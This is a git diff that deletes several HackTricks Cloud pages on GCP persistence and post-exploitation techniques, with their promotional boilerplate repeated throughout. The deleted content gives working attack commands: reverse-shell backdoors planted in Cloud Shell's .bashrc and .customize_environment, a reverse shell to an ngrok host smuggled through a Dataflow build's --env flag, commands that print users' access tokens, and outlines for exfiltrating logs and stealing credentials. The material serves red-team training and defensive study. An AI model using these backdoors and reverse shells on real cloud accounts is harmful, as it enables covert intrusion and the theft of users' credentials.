-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud Run
-
-For more information about Cloud Run check:
-
-{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
-[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
-{% endcontent-ref %}
-
-### Backdoored Revision
-
-Create a new backdoored revision of a Run Service and split some traffic to it.
-
-### Publicly Accessible Service
-
-Make a Service publicly accessible
-
-### Backdoored Service or Job
-
-Create a backdoored Service or Job
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
deleted file mode 100644
index 5f7960285..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
+++ /dev/null
@@ -1,98 +0,0 @@
-# GCP - Cloud Shell Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cloud Shell - -For more information check: - -{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %} -[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md) -{% endcontent-ref %} - -### Persistent Backdoor - -[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. - -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. - -This console has some interesting capabilities for attackers: - -1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org). -2. Said instance will **maintain its home directory for at least 120 days** if no activity happens. -3. There is **no capabilities for an organisation to monitor** the activity of that instance. - -This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing: - -{% code overflow="wrap" %} -```bash -echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc -``` -{% endcode %} - -There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). 
Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell: - -```bash -#!/bin/sh -apt-get install netcat -y -nc 443 -e /bin/bash -``` - -{% hint style="warning" %} -It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used. -{% endhint %} - -This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session: - -
- -However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**: - -```bash -gcloud auth print-access-token -gcloud auth application-default print-access-token -``` - -#### How the SSH connection is stablished - -Basically, these 3 API calls are used: - -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell) - -But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) - -## References - -* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) -* [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) -* 
[https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
deleted file mode 100644
index 1cfe2f833..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# GCP - Cloud SQL Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud SQL
-
-For more information about Cloud SQL check:
-
-{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
-[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
-{% endcontent-ref %}
-
-### Expose the database and whitelist your IP address
-
-A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
-For more information check the technique in:
-
-{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %}
-[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
-{% endcontent-ref %}
-
-### Create a new user / Update users password / Get password of a user
-
-To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
-Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
-Remember that **it's possible to list the users of a database** using GCP API.
-
-{% hint style="info" %}
-You can create/update users using GCP API or from inside the databae if you have enough permissions.
-{% endhint %}
-
-For more information check the technique in:
-
-{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %}
-[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
deleted file mode 100644
index 06a63c4e9..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# GCP - Compute Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Compute
-
-For more informatoin about Compute and VPC (Networking) check:
-
-{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %}
-[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/)
-{% endcontent-ref %}
-
-### Persistence abusing Instances & backups
-
-* Backdoor existing VMs
-* Backdoor disk images and snapshots creating new versions
-* Create new accessible instance with a privileged SA
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md deleted file mode 100644 index 13153856c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# GCP - Dataflow Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dataflow - -### Invisible persistence in built container - -Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template: - -```bash -git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git -cd python-docs-samples/dataflow/flex-templates/getting_started - -# Create repository where dockerfiles and code is going to be stored -export REPOSITORY=flex-example-python -gcloud storage buckets create gs://$REPOSITORY - -# Create artifact storage -export NAME_ARTIFACT=flex-example-python -gcloud artifacts repositories create $NAME_ARTIFACT \ - --repository-format=docker \ - --location=us-central1 -gcloud auth configure-docker us-central1-docker.pkg.dev - -# Create template -export NAME_TEMPLATE=flex-template -gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \ - --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \ - --sdk-language "PYTHON" \ - --flex-template-base-image "PYTHON3" \ - --metadata-file "metadata.json" \ - --py-path "." \ - --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \ - --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \ - --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \ - --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \ - --region=us-central1 -``` - -**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it. 
- -Then, next time the job is executed, the compromised container built will be run: - -```bash -# Run template -gcloud dataflow $NAME_TEMPLATE run testing \ - --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \ - --parameters=output="gs://$REPOSITORY/out" \ - --region=us-central1 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
deleted file mode 100644
index 9710f452c..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Filestore Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Filestore
-
-For more information about Filestore check:
-
-{% content-ref url="../gcp-services/gcp-filestore-enum.md" %}
-[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md)
-{% endcontent-ref %}
-
-### Give broader access and privileges over a mount
-
-An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page:
-
-{% content-ref url="gcp-filestore-persistence.md" %}
-[gcp-filestore-persistence.md](gcp-filestore-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
deleted file mode 100644
index 05deeb7fa..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# GCP - Logging Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Logging - -Find more information about Logging in: - -{% content-ref url="../gcp-services/gcp-logging-enum.md" %} -[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md) -{% endcontent-ref %} - -### `logging.sinks.create` - -Create a sink to exfiltrate the logs to an attackers accessible destination: - -{% code overflow="wrap" %} -```bash -gcloud logging sinks create --log-filter="FILTER_CONDITION" -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
deleted file mode 100644
index 09a46acea..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# GCP - Secret Manager Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Secret Manager
-
-Find more information about Secret Manager in:
-
-{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %}
-[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md)
-{% endcontent-ref %}
-
-### Rotation misuse
-
-An attacker could update the secret to:
-
-* **Stop rotations** so the secret won't be modified
-* **Make rotations much less often** so the secret won't be modified
-* **Publish the rotation message to a different pub/sub**
-* **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
deleted file mode 100644
index ada06789d..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# GCP - Storage Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Storage - -For more information about Cloud Storage check: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### `storage.hmacKeys.create` - -You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create). - -```bash -# Create key -gsutil hmac create - -# Configure gsutil to use it -gsutil config -a - -# Use it -gsutil ls gs://[BUCKET_NAME] -``` - -Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). - -### Give Public Access - -**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in: - -{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %} -[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
deleted file mode 100644
index 5c17fd3ec..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
+++ /dev/null
@@ -1,70 +0,0 @@
-# GCP - App Engine Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## `App Engine` - -For information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush` - -With these permissions it's possible to: - -* Add a key -* List keys -* Get a key -* Delete - -{% hint style="danger" %} -However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**. - -If you know easier ways to use these permissions send a Pull Request! -{% endhint %} - -### `logging.views.access` - -With this permission it's possible to **see the logs of the App**: - -```bash -gcloud app logs tail -s -``` - -### Read Source Code - -The source code of all the versions and services are **stored in the bucket** with the name **`staging..appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**. - -### Modify Source Code - -Modify source code to steal credentials if they are being sent or perform a defacement web attack. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
deleted file mode 100644
index 4eb194006..000000000
